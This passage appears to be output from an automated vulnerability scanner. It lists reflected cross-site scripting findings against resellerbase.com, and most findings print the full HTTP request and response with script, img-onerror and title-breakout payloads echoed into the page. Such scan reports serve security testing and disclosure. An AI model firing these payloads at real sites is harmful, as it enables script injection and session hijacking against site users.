Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:05:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9866

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos/images/rating/search.phpc3569<img src=a onerror=alert(1)>ad4eca3e1adb7c49c]</td>
...[SNIP]...

2.4538. http://www.resellerbase.com/tag/themes/kosmos/images/rating/search.php [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as text between TITLE tags. The payload 8aae9</title><img%20src%3da%20onerror%3dalert(1)>4c2abf8a221258f76 was submitted in the REST URL parameter 6. This input was echoed as 8aae9</title><img src=a onerror=alert(1)>4c2abf8a221258f76 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/themes/kosmos/images/rating/search.php8aae9</title><img%20src%3da%20onerror%3dalert(1)>4c2abf8a221258f76?keyword=search...&Submit3=Search&opt=2&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:05:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9882

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos/images/rating/search.php8aae9</title><img src=a onerror=alert(1)>4c2abf8a221258f76</title>
...[SNIP]...

2.4539. http://www.resellerbase.com/tag/themes/kosmos/images/rating/search.php [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as text between TITLE tags. The payload e1288</title><img%20src%3da%20onerror%3dalert(1)>b3de2c83feb was submitted in the REST URL parameter 6. This input was echoed as e1288</title><img src=a onerror=alert(1)>b3de2c83feb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images/rating/search.phpe1288</title><img%20src%3da%20onerror%3dalert(1)>b3de2c83feb?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:03:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9870

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos/images/rating/search.phpe1288</title><img src=a onerror=alert(1)>b3de2c83feb</title>
...[SNIP]...

2.4540. http://www.resellerbase.com/tag/themes/kosmos/images/rating/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/rating/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload a792c<img%20src%3da%20onerror%3dalert(1)>48e607ebde6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a792c<img src=a onerror=alert(1)>48e607ebde6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images/rating/search.php/a792c<img%20src%3da%20onerror%3dalert(1)>48e607ebde6 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:53:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9856

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos/images/rating/search.php/a792c<img src=a onerror=alert(1)>48e607ebde6]</td>
...[SNIP]...

2.4541. http://www.resellerbase.com/tag/themes/kosmos/images/rating/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/rating/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as text between TITLE tags. The payload 10b39</title><img%20src%3da%20onerror%3dalert(1)>85d6948052b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 10b39</title><img src=a onerror=alert(1)>85d6948052b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images/rating/search.php/10b39</title><img%20src%3da%20onerror%3dalert(1)>85d6948052b HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:53:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9872

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos/images/rating/search.php/10b39</title><img src=a onerror=alert(1)>85d6948052b</title>
...[SNIP]...

2.4542. http://www.resellerbase.com/tag/themes/kosmos/images/review/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 48162<script>alert(1)</script>400e891128 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag48162<script>alert(1)</script>400e891128/themes/kosmos/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:00:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag48162<script>alert(1)</script>400e891128/themes/kosmos/images/review/ was not found on this server.</p>
...[SNIP]...

2.4543. http://www.resellerbase.com/tag/themes/kosmos/images/review/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 43291<a>0f1b45dc283 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /tag/themes43291<a>0f1b45dc283/kosmos/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:00:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag/themes43291<a>0f1b45dc283/kosmos/images/review/ was not found on this server.</p>
...[SNIP]...

2.4544. http://www.resellerbase.com/tag/themes/kosmos/images/review/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 20099<a>604cccae90e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /tag/themes/kosmos20099<a>604cccae90e/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:01:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag/themes/kosmos20099<a>604cccae90e/images/review/ was not found on this server.</p>
...[SNIP]...

2.4545. http://www.resellerbase.com/tag/themes/kosmos/images/review/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 95280<a>452538f0f02 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /tag/themes/kosmos/images95280<a>452538f0f02/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:01:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag/themes/kosmos/images95280<a>452538f0f02/review/ was not found on this server.</p>
...[SNIP]...

2.4546. http://www.resellerbase.com/tag/themes/kosmos/images/review/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 2c715<a>8e6440da0b2 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /tag/themes/kosmos/images/review2c715<a>8e6440da0b2/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:01:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag/themes/kosmos/images/review2c715<a>8e6440da0b2/ was not found on this server.</p>
...[SNIP]...

2.4547. http://www.resellerbase.com/tag/themes/kosmos/images/review/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/review/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 53c6b<script>alert(1)</script>19ebb070a49 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag/themes/kosmos/images/review/?53c6b<script>alert(1)</script>19ebb070a49=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:59:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag/themes/kosmos/images/review/?53c6b<script>alert(1)</script>19ebb070a49=1 was not found on this server.</p>
...[SNIP]...

2.4548. http://www.resellerbase.com/tag/themes/kosmos/images/review/0.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b7c3a<script>alert(1)</script>8940e5a87c9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tagb7c3a<script>alert(1)</script>8940e5a87c9/themes/kosmos/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:52:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tagb7c3a<script>alert(1)</script>8940e5a87c9/themes/kosmos/images/review/0.gif was not found on this server.</p>
...[SNIP]...

2.4549. http://www.resellerbase.com/tag/themes/kosmos/images/review/0.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ba430<img%20src%3da%20onerror%3dalert(1)>5f07d888b71 was submitted in the REST URL parameter 2. This input was echoed as ba430<img src=a onerror=alert(1)>5f07d888b71 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themesba430<img%20src%3da%20onerror%3dalert(1)>5f07d888b71/kosmos/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:53:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9844

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themesba430<img src=a onerror=alert(1)>5f07d888b71/kosmos/images/review/0.gif]</td>
...[SNIP]...

2.4550. http://www.resellerbase.com/tag/themes/kosmos/images/review/0.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload c8786</title><img%20src%3da%20onerror%3dalert(1)>8362bf09e3e was submitted in the REST URL parameter 2. This input was echoed as c8786</title><img src=a onerror=alert(1)>8362bf09e3e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themesc8786</title><img%20src%3da%20onerror%3dalert(1)>8362bf09e3e/kosmos/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:53:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9860

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themesc8786</title><img src=a onerror=alert(1)>8362bf09e3e/kosmos/images/review/0.gif</title>
...[SNIP]...

2.4551. http://www.resellerbase.com/tag/themes/kosmos/images/review/0.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f1815<img%20src%3da%20onerror%3dalert(1)>a4ee42b0d0f was submitted in the REST URL parameter 3. This input was echoed as f1815<img src=a onerror=alert(1)>a4ee42b0d0f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmosf1815<img%20src%3da%20onerror%3dalert(1)>a4ee42b0d0f/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:53:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9844

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmosf1815<img src=a onerror=alert(1)>a4ee42b0d0f/images/review/0.gif]</td>
...[SNIP]...

2.4552. http://www.resellerbase.com/tag/themes/kosmos/images/review/0.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 978fe</title><img%20src%3da%20onerror%3dalert(1)>a36605842ed was submitted in the REST URL parameter 3. This input was echoed as 978fe</title><img src=a onerror=alert(1)>a36605842ed in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos978fe</title><img%20src%3da%20onerror%3dalert(1)>a36605842ed/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:53:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9860

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos978fe</title><img src=a onerror=alert(1)>a36605842ed/images/review/0.gif</title>
...[SNIP]...

2.4553. http://www.resellerbase.com/tag/themes/kosmos/images/review/0.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as text between TITLE tags. The payload c9489</title><img%20src%3da%20onerror%3dalert(1)>b81f2bd1a37 was submitted in the REST URL parameter 4. This input was echoed as c9489</title><img src=a onerror=alert(1)>b81f2bd1a37 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/imagesc9489</title><img%20src%3da%20onerror%3dalert(1)>b81f2bd1a37/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:54:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9860

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos/imagesc9489</title><img src=a onerror=alert(1)>b81f2bd1a37/review/0.gif</title>
...[SNIP]...

2.4554. http://www.resellerbase.com/tag/themes/kosmos/images/review/0.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 135c8<img%20src%3da%20onerror%3dalert(1)>f65d9a6d1cb was submitted in the REST URL parameter 4. This input was echoed as 135c8<img src=a onerror=alert(1)>f65d9a6d1cb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images135c8<img%20src%3da%20onerror%3dalert(1)>f65d9a6d1cb/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:54:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9844

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos/images135c8<img src=a onerror=alert(1)>f65d9a6d1cb/review/0.gif]</td>
...[SNIP]...

2.4555. http://www.resellerbase.com/tag/themes/kosmos/images/review/0.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as text between TITLE tags. The payload 9ef4e</title><img%20src%3da%20onerror%3dalert(1)>41fca3dcbf1 was submitted in the REST URL parameter 5. This input was echoed as 9ef4e</title><img src=a onerror=alert(1)>41fca3dcbf1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

